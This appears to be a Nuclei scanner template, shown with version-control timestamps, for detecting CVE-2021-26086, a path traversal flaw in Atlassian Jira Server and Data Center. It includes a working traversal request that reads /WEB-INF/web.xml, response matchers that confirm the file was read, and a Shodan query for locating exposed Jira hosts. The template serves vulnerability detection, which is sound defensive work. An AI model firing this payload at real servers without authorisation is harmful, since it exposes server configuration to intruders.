2021-08-26 03:45:56 +00:00
id : CVE-2021-26086
info :
2022-07-26 13:45:11 +00:00
name : Atlassian Jira Limited - Local File Inclusion
2021-08-26 03:45:56 +00:00
author : cocxanh
severity : medium
2022-07-26 13:45:11 +00:00
description : Affected versions of Atlassian Jira Limited Server and Data Center are vulnerable to local file inclusion because they allow remote attackers to read particular files via a path traversal vulnerability in the /WEB-INF/web.xml endpoint.
2021-08-26 09:57:01 +00:00
reference :
2021-08-26 03:45:56 +00:00
- https://jira.atlassian.com/browse/JRASERVER-72695
2022-05-17 09:18:12 +00:00
- http://packetstormsecurity.com/files/164405/Atlassian-Jira-Server-Data-Center-8.4.0-File-Read.html
2022-07-26 13:45:11 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-26086
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 5.3
2021-09-10 11:26:40 +00:00
cve-id : CVE-2021-26086
cwe-id : CWE-22
2022-07-04 13:17:44 +00:00
metadata :
shodan-query : http.component:"Atlassian Jira"
2022-08-27 04:41:18 +00:00
tags : lfi,packetstorm,cve,cve2021,jira
2021-08-26 03:45:56 +00:00
requests :
- method : GET
path :
2021-08-26 09:55:05 +00:00
- "{{BaseURL}}/s/{{randstr}}/_/;/WEB-INF/web.xml"
2021-08-26 03:45:56 +00:00
matchers-condition : and
matchers :
- type : status
status :
- 200
2021-08-26 09:55:05 +00:00
2021-08-26 03:45:56 +00:00
- type : word
words :
2021-08-26 09:55:05 +00:00
- "<web-app"
- "</web-app>"
2021-08-26 03:45:56 +00:00
part : body
2021-08-26 09:55:05 +00:00
condition : and
2022-07-26 13:45:11 +00:00
# Enhanced by mp on 2022/07/22